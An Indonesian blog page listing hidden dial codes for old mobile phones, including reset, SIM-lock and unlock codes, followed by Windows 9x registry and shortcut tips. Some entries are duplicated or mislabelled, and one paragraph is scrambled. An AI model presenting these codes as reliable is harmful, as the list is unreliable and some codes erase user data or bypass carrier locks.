Perkakas ‹ “B4y4u4B” — WordPress
KODE
Ada sedikit koleksi kode rahasia HP,mungkin di butuhkan buat para juragan Counter dan bengkel2 HP
Langsung aja dah..
Nokia
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#0000# Menampilkan versi firmware.
3. *#9999# Merupakan alternatif jika kode *#0000# tidak berfungsi.
4. *#8110# Menampilkan versi firmware (Nokia 8110).
5. *#21# Melihat pengalihan untuk semua panggilan ‘All calls’.
6. **21*nomor tujuan# Mengalihkan panggilan ke nomor yang dituju untuk semua panggilan.
7. **61*nomor tujuan# Mengalihkan panggilan ke nomor yang dituju untuk panggilan yang tidak terjawab.
8. **67*nomor tujuan# Mengalihkan panggilan ke nomor yang dituju untuk panggilan ketika sedang sibuk.
9. *#61# Melihat nomor pengalihan karena tidak dijawab ‘Call divert’.
10. *#62# Melihat nomor pengalihan karena diluar jangkauan ‘Call divert’ dan mengetahui kemana nomor tersebut dialihkan.
11. *#67# Melihat nomor pengalihan karena sibuk ‘Call divert’ dan mengetahui kemana nomor tersebut dialihkan.
12. *#2820# Menampilkan alamat IP Bluetooth.
13. *#30# Menampilkan nomor pribadi.
14. *#43# Melihat status ‘Call waiting’.
15. *#62209526# atau *#MACOWLAN Menampilkan alamat MAC WLAN.
16. *#67705646# Mengganti operator logo (tipe 3310, 3330).
17. *#73# Mereset timer ponsel dan skor game.
18. *#746025625# Menampilkan status SIM Clock. Jika ponsel anda
mendukung fungsi power saving akan muncul tulisan “SIM Clock Stop
Allowed”, itu berarti anda bisa mendapatkan waktu terbaik untuk standby.
19. *#7370# atau *#RESO# Mereset ke setingan awal (pabrikan), data-data akan terhapus
20. *#7760# Menampilkan kode pabrik/produk.
21. *#7780# atau *#rst0* Mereset ke setingan awal (pabrikan), data-data tidak akan terhapus.
22. *#92702689# atau *#war0anty# Menampilkan nomor serial, tanggal
pembuatan, tanggal pembelian, tanggal terakhir servis (000 jika belum
pernah diperbaiki) dan transfer user data. Pada beberapa ponsel setelah
menggunakan kode ini anda harus merestart ponsel.
23. *#2640# Menampilkan kode pengamanan ponsel.
24. *#3370# Mengaktifkan EFR (Full Rate Codec), kualitas suara terbaik namun pemakaian baterai menjadi boros.
25. #3370# Untuk menonaktifkan EFR.
26. *#4720# Mengaktifkan Half Rate Codec, kualitas suara terendah namun pemakaian baterai menjadi lebih hemat.
27. #4720# Untuk menonaktifkan Half Rate Codec.
28. 10# Cara cepat untuk membuka nomor kontak yang tersimpan di kartu
SIM berdasarkan nomor urut. Contoh angka 10 adalah nomor urut kontak.
29. #pw+1234567890+1# Mengunci status provider, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
30. #pw+1234567890+1# Mengunci status provider, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
31. #pw+1234567890+2# Mengunci status network, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
32. #pw+1234567890+3# Mengunci status country, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
33. #pw+1234567890+4# Mengunci status kartu SIM, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
Sony Ericsson
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#0000# atau 0000 Mereset kembali ke bahasa inggris.
3. >*<<* untuk melihat semua teks yang terdapat pada ponsel.
4. <**< Untuk mengunci SIM Card agar tidak bisa mengganti SIM Card. Untuk membukanya dengan unlock code.
5. *<<* Mengunci layanan provider.
6. **04*0000*0000*0000# Mengakses ponsel tanpa SIM Card.
7. 0# Melihat nomor terakhir yang ditelepon.
Motorola
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#303# OK Mengubah ke bahasa inggris.
3. *#300# OK Menampilkan versi software (SW and HW Version).
4. *#301# OK Test keypad.
5. 1234 OK Kode default ponsel.
6. *#311# OK Merubah kode ponsel default.
7. ***113*1* OK Net Monitor ON.
8. **113*1* OK Net Monitor OFF.
9. *#304# OK Set Off engineering mode.
10. *#304*1998072# OK Set On engineering mode.
11. *#307* OK Engineering test mode.
12. *#400# OK ADC call val.
13. 19980722 OK Master unlock code for phone and sim lock.
14. *#0000# OK Setting and restore.
15. *#402# OK Contrast
16. *#305# OK Location 1
Samsung
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#9999# atau *#9998*9999# Menampilkan versi software.
3. *#9999# atau *#9998*8888# Menampilkan versi hardware.
4. *#9998*76# Menampilkan nomor produksi.
5. *#9998*288# atau *#0288# Mengecek status baterai.
6. *#0246# atau *#0377# Menampilkan kapasitas ruang penyimpanan / memori.
7. *#9998*782# atau *#0782# Menampilkan tanggal dan waktu alarm.
8. *#8999*638# Menampilkan informasi jaringan telepon.
9. *#9998*523# atau *#0523# Mengatur kontras layar.
10. *#8999*5646# Mengubah logo operator.
11. *#0289# Tes ringtone.
12. *#9998*842# atau *#0842# Tes vibrate.
13. *#9998*289# atau *#0289# Mengubah suara alarm.
14. *#9998*746# atau *#0746# Melihat informasi kartu SIM
15. *2767*2878# Mengunci ponsel.
16. *2767*3855# Mereset memori, jangan lupa mencabut kartu SIM.
17. *#0324# Net Monitor
18. *#0001# Display RS232 serial communication parameter setup.
19. *9266# Display received channel number and received intensity.
20. *#9998*377# atau *#0377# Software error LOG (wrong display of EEPROM).
21. *#9998*778# atau *#0778# SIM Service Table.
22. *#0837# Instruction Software.
23. *#0001# Show Serial Parameter.
24. *#9998*968# View Melody Alarm.
25. *#9998*585# Non Volatile Memory.
26. *#3243948# Digital Audio Interference off.
27. *#32436837# Digital Audio Interference.
28. *#9998*4357# Help Menu.
29. *#9998*5282# Java Menu.
30. *2767*5282# Java Reset.
31. *2767*927# WAP Reset.
32. *2767*63342# Reset Media.
33. *#9999#0# Monitor Mode.
Siemens
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#0000# Mengembalikan ke bahasa default.
3. **05*PUK*newPIN*newPIN# Deblock PIN using PUK.
4. **052*PUK2*newPIN2*newPIN2# Deblock PIN2 using PUK2.
5. **04*old_PIN*new_PIN*new_PIN# Mengubah PIN.
6. **042*old_PIN2*new_PIN2*new_PIN2# Mengubah PIN2.
7. *31# Menyembunyikan nama/nomor telepon pada ponsel penerima (CLIR).
8. #31# Menonaktifkan CLIR.
9. *#31# Mengecek status CLIR.
10. *30# Menampilkan nama/nomor telepon pada ponsel penerima (CLIP).
11. #30# Menonaktifkan CLIP.
12. *#30# Mengecek status CLIP.
13. *43# Mengaktifkan Call Waiting/Call Hold.
14. #43## Menonaktifkan Call Waiting.
15. *#43# Mengecek status Call Wating.
16. *#0001# lalu tekan tombol hijau (Call) Mengubah bahasa menggunakan
kode. Angka 0001 adalah kode untuk bahasa inggris. Kode: 0030 (Yunani),
0031 (Belanda), 0032 (Perancis), 0034 (Spanyol), 0039 (Itali), 0049
(Jerman), 0090 (Turki).
17. *#0606# Shows if the phone is locked to any network (Use without SIM card).
BenQ-Siemens
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#0000# Mengembalikan ke bahasa default.
3. *#0001# lalu tekan tombol hijau (Call) Mengubah bahasa menggunakan
kode. Angka 0001 adalah kode untuk bahasa inggris. Kode: 0030 (Yunani),
0031 (Belanda), 0032 (Perancis), 0034 (Spanyol), 0039 (Itali), 0049
(Jerman), 0090 (Turki)
4. *#9999# Mereset ke setingan awal (pabrikan).
5. *#300# Mengecek software.
6. *#301# Mengecek hardware.
LG
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#07# Menampikan nomor IMEI dan versi software (LG 510).
3. *8375# Menampilkan versi software (LG B1200).
4. #PWR668 Test pabrikan (LG B1200).
5. 1945#5101# Simlock menu (LG B1200).
6. 2945#*5101# Simlock menu (LG 510W, 5200)
7. 2945#*70001# Simlock menu (LG 7020,7010)
Philips
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#3353*# Mereset ponsel.
3. *#7337*# Mereset ponsel (Master reset), kartu SIM dicabut dulu..
4. *#337*# Mengaktifkan/menonaktifkan EFR.
5. *#7693# Mengaktifkan/menonaktifkan Sleep Mode. Aktifkan saja untuk
menghemat konsumsi baterai ketika ponsel sedang tidak dipakai.
6. *#8463*# Menampilkan beberapa informasi Sleep Mode: Wake, Sleep Req., Sleep.
7. *#2286*# Mengaktifkan data baterai.
8. *#7948*# Mematikan ponsel.
9. *#7728*# Menampilkan RSAV.
10. *#7524*# Menampilkan KCGPRS.
11. *#7562*# Menampilkan SIM Phase.
12. *#7629*# Menampilkan POOL MAX.
13. *#7632*# Menampilkan Code Bugging dari sleep mode.
14. *#7733*# Menampilkan Cluster aktif.
15. *#7343*# Menampilkan kode Cluster.
16. *#7352*# Menampilkan registrasi software.
17. *#7763*# Menampilkan informasi produk.
18. *#7766*# Menampilkan versi produk.
19. *#7326*# Menampilkan pilihan aksesoris untuk vibrator.
20. *#7276*# Mengaktifkan GPRS Attach.
21. *#7287*# Mengaktifkan GPRS Attached.
22. *#7288*# Mengaktifkan GPRS Try Attached.
23. *#7271*# Mengaktifkan GPRS Kelas 1
24. *#7274*# Mengaktifkan GPRS Kelas 4.
25. *#7252*# Mengaktifkan GPRS Kelas B.
26. *#7224*# Mengaktifkan GPRS Kelas C.
27. *#7222*# Mengaktifkan CSD GSM Kelas C.
28. *#7762*# Melakukan seting SMS bearer GPRS.
29. *#8377*# Menampilkan versi software.
30. *#3377*# Menampilkan kondisi EEPROMP.
31. *#2254# Status Register.
32. *#2255# Active/Deactive “Debug Call”, when activated, make a call
to a busy line an the phone will display some hex-codes on the display.
33. *#2558# The time in days, hours, and minutes you are connected to the net..
34. *#7489*# atau *#1234*# Security Code.
35. *#7378*# Name, Length, SIM Phase.
36. *#3333*# Blocking list.
Panasonic
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. **7370# Memformat ulang.
Alcatel
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. ###847# Reset full.
3. ###765*02# Memblokir panggilan masuk atau keluar (Add barring groups).
4. ###765*78# Menonaktifkan Barring groups.
5. ###765*05# Menonaktifkan/mengunci status network.
6. ###765*07# Mengaktifkan status network.
7. 000000* Net Monitor.
TIPS
KUMPULAN TIP DAN TRIK PADA WINDOWS
Mencegah penggantian setting Display Properties
Anda dapat melakukan Setting display dari Control Panel – Display atau melalui klik kanan pada desktop, lalu pilih Properties.
Dengan setting di bawah ini orang lain tidak dapat mengganti setting pada Display tersebut.
Ikutilah langkah berikut.
Klik Start——–>Run, ketikkan regedit lalu tekan Enter.
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\System
Value Name: NoDispCPL
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/mencegah penggantian)
Shortcut untuk Shutdown
Untuk mempercepat shutdown Anda bisa membuat shortcut pada desktop. Caranya :
1. Klik kanan area kosong pada desktop lalu pilih New – Shortcut.
2. Pada command line ketikkan c:\windows\rundll32.exe user, exitwindows.
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.
Mencegah perubahan setting Printer
Jika Anda meng-enable setting ini, maka orang lain tidak dapat mengganti setting pada Control Panel – Printer.
Ikutilah langkah berikut.
Klik Start—–>Run, ketikkan regedit lalu tekan Enter.
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer
Value Name: NoPrinters
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)
Mencegah perubahan setting Password
Jika Anda meng-enable setting ini, maka orang lain tidak dapat mengganti setting pada Control Panel – Password. Dengan kata lain orang lain tidak dapat mengganti password (jika komputer Anda memakai password Windows).
Ikutilah langkah berikut.
Klik Start——>Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\System
Value Name: NoSecCPL
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)
Mencetak daftar file pd folder
Sistem operasi Windows tidak menyediakan fasilitas untuk mencetak daftar file pada suatu directory. Tapi dengan sedikit tips berikut Anda bisa melakukannya. Caranya dari menu Start, —> Run. Ketikkan command /c dir>prn lalu klik OK atau cukup tekan Enter.
Mengubah Icon Drive dengan AutoRun
Pernah lihat icon Drive CDROM yang berubah ketika kita memasukan sebuah CD? nah.. hal yang sama bisa juga kita praktekkan pada Drive Harddisk. Bukalah Notepad anda dan ketik :
[autorun]
icon=nama icon.ico
Save dengan nama autorun.inf dan letakan di root drive yang dituju ( ct : C:\ atau D:\ )
Selanjutnya, letakan file icon yang kita inginkan di tempat yang sama dengan file autorun.inf, lalu restart komputer anda.
Tips : agar tampilan file di drive tidak berantakan, ubah atribut kedua file tersebut menjadi hidden.
Disable klik kanan pada Dekstop & Windows Explorer
Jika Anda meng-enable setting di bawah ini maka tidak ada yang bisa melakukan klik kanan pada Desktop & Windows Explorer. Dengan kata lain menu yang muncul waktu klik kanan tidak ada lagi.
Ikutilah langkah berikut.
Klik Start—->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer
Value Name: NoViewContextMenu
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)
Disable klik kanan pada Taskbar
Jika Anda meng-enable setting di bawah ini maka tidak akan muncul menu waktu melakukan klik kanan pada Start Menu, Tab control, dan Clock.Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer]
Value Name: NoTrayContextMenu
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)
Menyembunyikan menu Taskbar
Jika Anda meng-enable setting ini maka menu Taskbar yang terdapat pada Setting pada Start Menu akan hilang.
Ikutilah langkah berikut.
Klik Start—–>Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer
Value Name: NoSetTaskbar
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)
Menyembunyikan menu Folder Options
Jika Anda meng-enable setting ini maka menu Folder Options yang terdapat pada Start Menu – Setting akan hilang.
Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer
Value Name: NoFolderOptions
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)
Hidden File
Agar tidak dapat dilihat atau berupa hidden file caranya rubah nama
filenya ( misal nama filenya adalah rajausil maka dari DOS ketikkan : “ren rajausil (Alt+0160) baru ganti attributnya dengan hidden dari DOS (bukan windows). Untuk membuka kembali atau menembusnya dengan mudah dapat digunakan Norton Commander ….. yaitu bila sudah masuk ke NC tekan tombol F6 dan ganti nama file yang katanya nggak kelihatan tadi.
Mempercepat Proses Start
Pada proses boot, Windows 98 biasanya mencari file WINSTART.BAT. Apabila file ini tidak ditemukan, sistem membutuhkan waktu lebih lama untuk start. Karena itu carilah file ini dalam direktori C:\WINDOWS. Bila memang tidak ada, buatlah sebuah file teks dengan klik kanan dan ‘New | Textfile’. Sebagai nama cantumkan ‘Winstart.bat’.
Memperluas menu “Send to”
Klik kanan sebuah file dalam Explorer akan menampilkan context menu dan melalui menu “Sent to” di dalamnya Anda dapat meng-copy file tersebut ke berbagai media seperti disket, folder “My Documentdapat diperluas kegunaannya misalnya untuk membuka sebuah file teks ke dalam program Wordpad.WORDPAD.EXE dapat Anda temukan pada Start menu dalam folder “Programs | Accessories”. Pada awalny” atau mengirimnya lewat e-mail. Menu ini buatlah terlebih dahulu sebuah shortcut untuk menjalankan Wordpad. Selanjutnya copy shortcut tersebut ke folder “\WINDOWS\ SEND TO”. Shortcut otomatis akan muncul setiap kali Anda mengakses context menu.
Memanggil fungsi Search lebih cepat
Fungsi Search pada Windows biasanya harus Anda capai melalui beberapa klik mouse dalam menu Start. Ada cara lainnya yang lebih cepat yaitu dengan me-minimize semua program yang terbuka dengan menggunakan fungsi “Show Desktop” pada taskbar (hanya pada Windows 98, Me, atau 2000) dan dilanjutkan dengan menekan tombol [F3]. Agar Anda tidak perlu menghambat pekerjaan yang sedang dilakukan dalam program yang lagi aktif, Anda juga dapat membuat shortcut untuk fungsi Search pada taskbar Windows 98, Me atau 2000. Untuk itu buka Explorer, klik kanan pada salah satu folder dan pilih “New | Text Document”. Ganti nama file tersebut menjadi SEARCH.FND dengan menekan tombol [F2] . Windows akan memperingatkan, file tersebut akan tidak dapat digunakan. Konfirmasikan pertanyaan tersebut dengan “Yes”. Akhiran file FND berhubungan dengan fungsi Search Windows. Setiap menemui file dengan akhiran ini, Windows akan otomatis membuka fungsi Search bila diklik ganda. Kini pindahkan file FND tersebut ke taskbar. Selanjutnya Anda dapat membuka jendela Search dengan mengklik icon tersebutlebih cepat.
Mempercepat login ke jaringan
Apabila PC Anda terhubung dengan sebuah jaringan, Anda mengenal masalah ini. Sering Anda harus mengakses sebuah resource jaringan. Sebaiknya buatlah sebuah drive-shortcut untuk itu. Dengan demikian Anda selalu dapat mengaksesnya dengan klik ganda. Akan tetapi, fungsi ini ada kelemahannya. Apabila Anda menstart PC, namun resource jaringan tidak tersedia, atau shortcut dihubungkan dengan link yang tidak ada, login ke jaringan bisa berlangsung sangat lama. Soalnya, Windows memeriksa link saat Anda login. Oleh karena itu sebaiknya buat shortcut pada desktop-Windows tidak memeriksanya.
Menonaktifkan File dan Printer Sharing
Windows memungkinkan pembuatan jaringan peer-to-peer untuk pertukaran data antar PC. Pertukaran data seperti ini mengandung resiko pengaksesan data Anda oleh siapa saja yang seharusnya tidak berhak. Walapun aksesnya telah Anda amankan dengan password, tetap saja ada orang yang dapat mengaksesnya dengan dengan meng-hack atau lewat bantuan tool tambahan. Karena itu lebih baik menentukan sebuah PC khusus hanya digunakan untuk pertukaran data. Yang ingin membagi data dapat meng-copy-kannya ke folder sharing PC tersebut. Pada PC Anda sendiri nonaktifkan sharing. Untuk itu pilih Properties pada My Network Places dan klik pada “File and Printer Sharing”. Dalam jendela dialog yang tampil uncheck kedua checkbox yang ada.
Menonaktifkan sharing hubungan Internet
Bila Anda telah menginstalasi “File and Printer Sharing”, sharing tidak hanya aktif dalam jaringan lokal, tetapi juga dalam- Internet. Dengan demikian sangat mudah mengaksesnya dari Internet. Untuk mengatasinya buka Properties pada My Network Places dan klik ganda entri “TCP/IP -> Network- Adapter”. Pindahlah ke tab “Connections” dan nonaktifkan checkbox “File and Printer Sharing for Microsoft Networks”.
Mempercepat restart
Bila Anda harus melakukan restart Windows ketika sedang bekerja, biasanya tahapan yang dilalui adalah ‘Start | Shutdown | Restart’. Dengan tahapan ini, PC menstart ulang dari awal. Apabila Andaterus menekan tombol [Shift] sebelumnya, proses restart akan lebih cepat karena tidak melalui BIOS.
Ubah Tampilan Windows
Bagi Anda yang bosan akan tampilan Blue Screen khas Windows, kini Anda dapat mengubahnya sesuai selera. (Mungkin nanti tidak disebut bluescreen lagi).Suntinglah file System.ini bagian [386Enh] Tambahkan baris seperti di bawah ini:
MessageTextColor=(pilih antara 0-F)
MessageBackColor=(pilih antara 0-F)
keterangan:
Black=0
Blue=1
Green=2
Cyan=3
Red=4
Magenta=5
Brown=6
White=7
Gray=8
Bright Blue=9
Bright Green=A
Bright Cyan=B
Bright Red=C
Pink=D
Yellow=E
Bright White=F
Reload registry dengan cepat
Setelah melakukan instalasi program, pada umumnya program tersebut akan ‘menuntut’ Windows untuk di-restart agar pe- rubahan yang dilakukan efektif. Dalam kebanyakankasus tujuan restart sebenarnya adalah untuk me-reload registry yang dapat dilakukan tanpa perlu me-restart Windows: Klik kanan pada desktop dan pilih “New | Shortcut”, lalu cantumkan perintah berikutini: C:\WINDOWS\RUNDLL32.EXE tshell32,SHExitWindowsEx Klik “Next”, berikan sebuah nama untuk shortcut tersebut dan klik lagi “Next”. Dengan meng-klik ganda pada shortcut tersebut,Windows akan langsung me-reload database registry tanpa perlu melakukanrestart.
Mengaktifkan DMA transfer untuk CD dan DVD
Umumnya drive CD ataupun DVD mengirimkan data yang dibacanya dari suatu media ke RAM harus terlebih dahulu melalui prosesor. Namun pengaturan aliran data membutuhkan kalkulasi yang sebenarnya tidak perlu dillakukan prosesor. Hal ini terutama terjadi saat memutar film DVD yang menyebabkan goyangan pada gambar saat dimainkan. Karena itu Anda perlu mengaktifkan DMA untuk drive tersebut sehingga data dapat langsung dikirimkan ke RAM. Buka “System | Device Manager” dan klik ganda drive CDROM/DVDROM. Klik tab “Settings” diikuti dengan mengaktifkan option “DMA”. Selanjutnya boot ulangWindows.
Mempercepat kinerja jaringan
Bila anda bekerja dalam jaringan Peer-to-Peer, PC yang dihidupkan paling awal akan bertindak sebagai pengelola login PC lainnya atau yang disebut sebagai “Browse Master”. Bila PC Browse Master dimatikan, sebuah PC lainnya dalam jaringan akan mengambil alih peran tersebut. Untuk melakukan mekanisme tersebut, sebuah fungsi search akan menanyakan secara teratur, keberadaan Browse Master tersebut. Hingga peran tersebut diambil-alih, butuh waktu beberapa menit. Selama itu PC yang terhubung dalam jaringan tidak dapat “ditemukan”. 3 Untuk mengatasinya, instalasikan sebuah PC sebagai Browse Master tetap dan nonaktifkan fungsi search pada PC lainnya. Caranya: Pilih Properties pada My Network Places dan klik ganda “File and Printer Sharing for Microsoft Network”. Pilih “Browse Master” pada bagian Property dan pilih “enabled” pada bagian value-nya, sementara pada PC lainnya pilih “Disabled”. Dengan demikian semua PC dalam jaringan akan langsung tampak. Selain itu Anda dapat menghindari padatnya lalu-lintas data di jaringan dengan mematikan fungsi search di atas. 3 Anda juga harus menonaktifkan fungsi search, bila melakukan login dengan PC Windows 9x ke dalam jaringan Windows NT atau 2000. Dalam hal ini Browse Masternya adalah server jaringan. Dengan mematikan fungsi search beban jaringan berkurang. KOMPUTER PEER-TO-PEER
Mencegah Pencarian Folder
Saat start,Windows Me otomatis mencari folder dan printer yang disediakan untuk sharing dalam jaringan dan menampilkannya dalam “My Network Places”. Proses ini memakan waktu. Untuk mematikan fungsi ini klik dalam “My Network Places” pada “Tools | Folder Options | View” dan nonaktifkan “Automatically search for network folders and printers”.
Menggunakan System Restore
Banyak rutin deinstalasi yang berasal dari masing-masing aplikasi tidak lagi dapat diandalkan. Driver yang rusak (corrupt) atau program yang ditulis kurang baik dapat menyebabkan Windows menjadi tidak stabil. Masalahnya semakin runyam apabila program yang cacat atau driver yang rusak tersebut tidak dapat disingkirkan dari sistem operasi lewat Add/Remove Programs Windows. Bila Anda bekerja dengan Windows Me, sebaiknya sebelum menginstalasi software baru tentukan titik restore (restore point) Windows dengan tool “System Restore”.Dengan demikian software dapat disingkirkan tanpa meninggalkan ‘sisa’ kalau terbukti cacat, bahkan dalam Safe Mode sekalipun. Anda dapat menemukan “System Restore” dalam System Tools pada Accessories. System Restore bekerja dengan melakukan pencatatan pada setiap aktivitas dari rutin instalasi program dan driver, dan bila diinginkan System Restore dapat mengembalikan kondisi Windows serupa dengan kondisi awal instalasi.
Menginstalasi screen saver dengan password
Bahaya terbesar bagi keamanan data Anda adalah apabila PC tidak diawasi dengan baik. Dapat terjadi hanya dalam hitungan menit, seorang pengguna dengan mudahnya melihat atau meng-copy data-data tersebut pada disket. Karena itu untuk amannya lakukan konfigurasi screen saver yang otomatis aktif setelah beberapa menit dan dapat menyembunyikan tampilan desktop Windows Anda. Itu saja belumlah cukup, berikan pengaman berupa password I kepada screen saver tersebut. Caranya: klik kanan pada dekstop dan pilih Properties. Pindah ke tab Screen Saver dan pilihlah motif tertentu. Klik Kanan Deskstop->Propertis->Screen Saver Tandai checkbox di depan “Password protected” agar screen saver hanya dapat ditutup dengan memasukkan password yang tepat.
Menyembunyikan menu Find
Jika Anda meng-enable setting berikut, maka Find yang terdapat pada Start Menu akan hilang.
Ikutilah langkah berikut.
Klik Start—->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer
Value Name: NoFind
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)
Menyembunyikan menu Run
Setting berikut akan menyembunyikan folder Document yang terdapat pada Start Menu. Ikutilah langkah berikut.
Klik Start—>Run, ketikkan regedit lalu tekan Enter.
Key :HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer
Value Name : NoRun
Data Type : REG_DWORD
Data: (0=disable, 1=enable)
Menginstalasi pengawas jaringan
Windows mempunyai tool untuk memonitor akses sharing pada PC. Instalasi dilakukan melalui “Add/Remove Programs” pada Control Panel. Bukalah tab “Windows Setup” dan scroll ke entri “System Tools” diikuti dengan klik ganda. Tandai “Net Wacther” dan klik “OK”. Anda akan menemukannya tool Net Wacther ini pada System Tools dalam kelompok Accessories di menu “Start | Programs”. Sebaiknya biarkan tool tersebut selalu aktif di latar belakang. Ia akan melaporkan, siapa saja dan berapa lama orang tersebut telah mengakses folder sharing di PC Anda.
Mematikan cache IE Windows
IE membuat sebuah cache untuk menyimpan halaman web yang Anda kunjungi. Tujuannya adalah agar sewaktu situs web yang mempunyai halaman tadi dikunjungi kembali, IE dapat me-load halamannya lebih cepat. Meskipun berguna namun akibatnya orang lain dapat mengetahui halaman mana saja yang telah Anda kunjungi. Bagi Anda yang membutuhkan privacy selagi berselancar, nonaktifkan saja cache tersebut melalui entri “Cache limit” dalam registry pada path “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \CurrentVersion\InternetSettings\Cache\ Content”. Bila entri tidak ada, buatlah dengan klik kanan dan perintah “New | DWORLD Value”. Klik ganda pada entri tersebut dan masukkan nilai “0″. Start ulang Windows. Setting ini berfungsi mulai dari IE versi 4.
Menyembunyikan alamat browsing
IE menyimpan alamat website yang terakhir dikunjungi untuk memudahkan input alamat yang sama pada kesempatan berikutnya. Bila ingin mengunjunginya kembali, otomatis IE akan melengkapi alamat tersebut. Dengan demikian orang lain dapat menduga URL apa saja yang telah Anda kunjungi.Untuk menghentikan pencatatan lebih dari 1 hari oleh IE ini, panggil “Internet Options” melalui Control Panel. Dalam tab “General” pada bagian History, masukkan nilai “0″ untuk jumlah hari penyimpanan alamat web. Dengan setting tersebut browser hanya menyimpan alamat pada ha tersebut yang sebenarnya juga sudah cukup beresiko. Karena itu setelah berselancar sebaiknya selalu mengklik tombol “Clear History” untuk menghapus alamat-alamat yang dikunjungi. Anda memang harus menuliskan alamat atau mengambilnya dari daftar Favorites, tetapi perilaku selancar Anda tak dapat diketahui oleh orang lain.
Menutup Windows Dengan Cepat
Ketika menutup Windows, tampil jendela dialog yang akan menanyakan apakah Anda ingin menutup sistem operasi Windows (Shut down), men-start ulang (restart) atau mengistirahatkannya dalam modus hemat energi (hibernate). Pertanyaan ini dapat Anda lewati (bypass) apabila dirasakan mengganggu. Untuk itu klik kanan pada desktop dan pilih perintah “New|Shortcut”. Di bawah Windows 98 atau Me masukkan sebagai baris perintah: rundll32.exe user,ExitWindows Exec dan di bawah Windows 95: rundll32.exe user,ExitWindows Berikan nama untuk shortcut yang baru tersebut dan klik tombol “Finish”. Jika sebuah klik ganda pada icon langsung menutup Windows.
Mengoptimalkan database registry
Setelah beberapa bulan menggunakan Windows, file registry akan terus membesar ukurannya.Akibatnya Windows akan membutuhkan semakin banyak waktu untuk me-load-nya saat start. Melalui sebuah perintah DOS sederhana Anda dapat mengkompresi area di registry yang tak perlu di dalam database-nya sehingga ukuran file-nya menjadi lebih kecil. Start Windows 98 (setelah start BIOS tekan tombol [F8] sambil memilih option “Command prompt only”. Selanjutnya masukkan perintah “scanreg /opt”. Program ini akan menghapus tempat kosong dalam database registry, sehingga ukuran file-nya akan semakin kecil. Khusus untuk Windows Me, lakukan boot dari disket dan panggil perintah tersebut dalam direktori C:\WINDOWS\COMMAND.
Lebih cepat menghapus tanpa melewati Recycle Bin
Bila Anda menghapus file di bawah Windows, sistem operasi tidak benar-benar menghapusnya melainkan memindahkan file tersebut ke dalam Recycle Bin. Bila data yang dihapus berukuran besar, proses tersebut tentu akan memakan waktu beberapa menit.Bila Anda yakin tidak memerlukan data tersebut, tak perlu melalui Recycle Bin. Hal ini dapat dilakukan melalui option “Remove file immediately when deleted” dalam Properties Recycle Bin, atau dengan menekan tombol [Shift] saat melakukan perintah “Delete” pada satu atau beberapa file/folder
Menyembunyikan menu Document pada Start Menu
Setting berikut akan menyembunyikan folder atau menu Document yang terdapat pada Start Menu.
Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name : NoRecentDocsMenu
Data Type : DWORD Value
Data: (0 = tampilkan, 1 = sembunyikan)
Menyembunyikan menu Run pada Start Menu
Setting berikut akan menyembunyikan folder Document yang terdapat pada Start Menu.
Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name : NoRun
Data Type : DWORD Value
Data: (0 = tampilkan, 1 = sembunyikan)
Disable klik kanan pada Dekstop & Windows Explorer
Jika Anda meng-enable setting di bawah ini maka tidak ada yang bisa melakukan klik kanan pada Desktop & Windows Explorer. Dengan kata lain menu yang muncul waktu klik kanan tidak ada lagi.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name: NoViewContextMenu
Data Type: DWORD Value
Data: (0 = disabled, 1 = enabled)
Untuk melihat perubahannya Anda perlu melakukan restart.
Disable klik kanan pada Taskbar
Jika Anda meng-enable setting di bawah ini maka tidak akan muncul menu waktu melakukan klik kanan pada Start Menu, Tab control, dan Clock.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name: NoTrayContextMenu
Data Type: DWORD Value
